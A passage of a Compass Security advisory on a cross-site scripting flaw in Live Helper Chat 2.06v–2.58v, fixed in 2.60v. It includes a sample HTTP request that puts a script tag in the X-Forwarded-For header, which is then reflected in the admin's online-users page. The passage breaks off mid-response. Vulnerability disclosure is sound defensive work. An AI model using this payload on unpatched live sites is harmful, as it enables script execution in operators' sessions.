to release it in April. They will confirm as soon as poss
Live Helper Chat - Cross-Site Scripting
# # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/en/research/advisories/ # # # CSNC ID: CSNC-2017-004 # Product: Live Helper Chat [1] # Vendor: Live Helper Chat # Subject: Cross-Site Scripting - XSS # Risk:High # Effect: Remotely exploitable # Author: Sylvain Heiniger (sylvain.heini...@compass-security.com) # Date:April 24, 2017 # # Introduction: Live Helper Chat is a live chat support for websites. It provides a simple solution for companies to get in contact with visitors of their websites. [1] Compass Security discovered a web application security flaw in the Live Helper Chat application which allows an attacker to execute JavaScript code in the browser of a user. This allows, for instance, attacking the user's browser or redirecting the user to a phishing website. The attack will be in some cases automatically run in the backend operator's session. Otherwise, one can send the victim a link to the website with the malicious payload. Affected Versions: --- The following Live Helper Chat versions are vulnerable: - 2.06v - 2.58v [2] Patches: --- Live Helper Chat released a patch as part of release 2.60v [3, 4]. Technical Description: - Live Helper Chat detects the visitor's IP address. To this end, it reads the "X-Forwarded-For" HTTP header. Any visitor can inject a tag in this header. It will be reflected in the administrator's "online users" information page as well as in the "print chat" page. User's request: === POST /lhc_web/index.php/chat/chatwidget/(vid)/47428qicplsqmfe9huq2/(leaveamessage)/true HTTP/1.1 Host: localhost X-Forwarded-For: <script>alert(1); Connection: close Content-Length: 188 Username=Example=My+question_timezone=2=%2F%2Flocalhost%2F==0=1_1977271e431742414c31477d258028664d713ae0=1475518554=1475518554 === Subsequent request to the online users page /lhc_web/index.php/site_admin/chat/onlineusers/(method)/ajax/(timeout)/3600/(maxrows)/50 will be responded with: === [{"id":"1","ip":"